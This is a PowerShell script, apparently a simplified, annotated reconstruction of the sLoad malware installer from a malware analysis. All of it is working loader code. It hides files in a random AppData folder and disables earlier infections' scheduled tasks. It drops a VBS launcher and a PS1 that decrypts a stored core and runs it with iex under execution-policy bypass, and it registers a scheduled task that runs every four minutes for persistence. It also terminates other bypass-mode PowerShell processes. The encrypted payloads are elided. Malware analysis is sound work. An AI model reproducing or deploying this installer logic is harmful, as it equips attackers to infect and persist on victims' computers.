#sLoad will install themselves in a random directory in APPDATA\. #In that directory 4 files will be saved: # - main.sh - The sload core as a MS secure string with key @(1..16) # - sleep.sh - The sload C2 list as a MS secure string with key @(1..16) # - .viki - The VBS script run at boot. This will simply run .ps1 # - .ps1 - A PS1 script that will decode and run the sload core #A random $installFileName= -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_}) #A random $installFolderName=-join ((65..90) + (97..122) | Get-Random -Count 9 | % {[char]$_}); $installDir = "c:\users\"+$env:username+"\AppData\Roaming\"+$installFolderName; #Secure strings key $key=@(1..16); #Make install dir If ( ! (test-path $installDir)) { New-Item -ItemType Directory -Force -Path $installDir } #Change PWD to install dir Set-Location -Path $installDir #Get all scheduled task whose name starts with a S followed by a number and disable them #This remove other sload installations since S\d+ tasks are created by sLoad $curScheduledTasks = schtasks /query /FO CSV /v | ConvertFrom-CSV -Header 'c','s','f','g','q','w','e','r','h' $curScheduledTasks = $curScheduledTasks | Where { $_.s -match '^\\S\d+.*' }; if ($curScheduledTasks -and $curScheduledTasks.length) { $nTasks = $curScheduledTasks.length; for ($i=0; $i -le $curScheduledTasks.length-1; $i++) { #Disable the task start-process -windowstyle 'hidden' 'schtasks /change /TN '+$curScheduledTasks[$i].s.substring(1)+' /disable' } } elseif ($curScheduledTasks) { $nTasks=1; #Disable the task start-process -windowstyle 'hidden' 'schtasks /change /TN '+$curScheduledTasks.s.substring(1)+' /disable'; } else { $nTasks=0; } #Save the core into main.sh in the isntall dir $sloadCore+='... long secure string ...'; $sloadCore.trim() | out-file $installDir'\main.sh'; #Save the C2 list in sleep.sh in the install dir $sloadC2s+='... not so long secure string ...'; $sloadC2s.trim() | out-file $installDir'\sleep.sh'; #The kickstarter VBS script (deobfuscated) that is launched at boot and will run a companion PS1 file $kickStarter = @" Set shell = WScript.CreateObject ("WScript.Shell") shell.CurrentDirectory="$installDir" shell.run "powershell -ep bypass file $installFileName.ps1", 0, -1 "@ #Create the persistence task and write the kickstarter VBS start schtasks -ArgumentList '/F /create /sc minute /mo 4 /TN "S' + $nTasks + $installFolderName + '" /ST 07:00 /TR "wscript /E:vbscript ' + $installDir + '\'+ $installFileName+'.viki"'; $kickStarter | out-file $installDir'\'$installFileName'.viki' #Write the companion (to the VBS script) PS1 file that will run the sload code in main.sh #The original form of the code would use: #$Ug=Get-Command -type Cmdlet | Where-Object {$_.name -notmatch 'stop' -and $_.name -notmatch 'invoke'} | Get-Random -Count 24 | select; #To make random command names inside a try catch and then put the real code in the catch clausole. #We simplified the whole script for clarity and thus also removed the generating code $kickStarterPS1 = @" $alreadyRunning = Get-WmiObject win32_process -Filter name="powershell.exe" | where {$_.CommandLine -match "$installFileName"}; if ($alreadyRunning[1] -eq $null) { $key = @(1..16); $bWbnuf = ; $sloadCore = gc "main.sh"; $sloadCoreDecoded = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR(ConvertTo-SecureString $sloadCore -key $key)); $sloadCoreDecoded -replace "wRaAWfUxZ|GTebwEjsc|MEIQLobzGC" | iex; } "@ $kickStarterPS1 | out-file $installDir'\'$installFileName'.ps1' #Terminate all powershell process with an execution bypass policies (i.e. copies of sload) (Get-WmiObject win32_process | where-object {$_.CommandLine -match "-ep "}).terminate()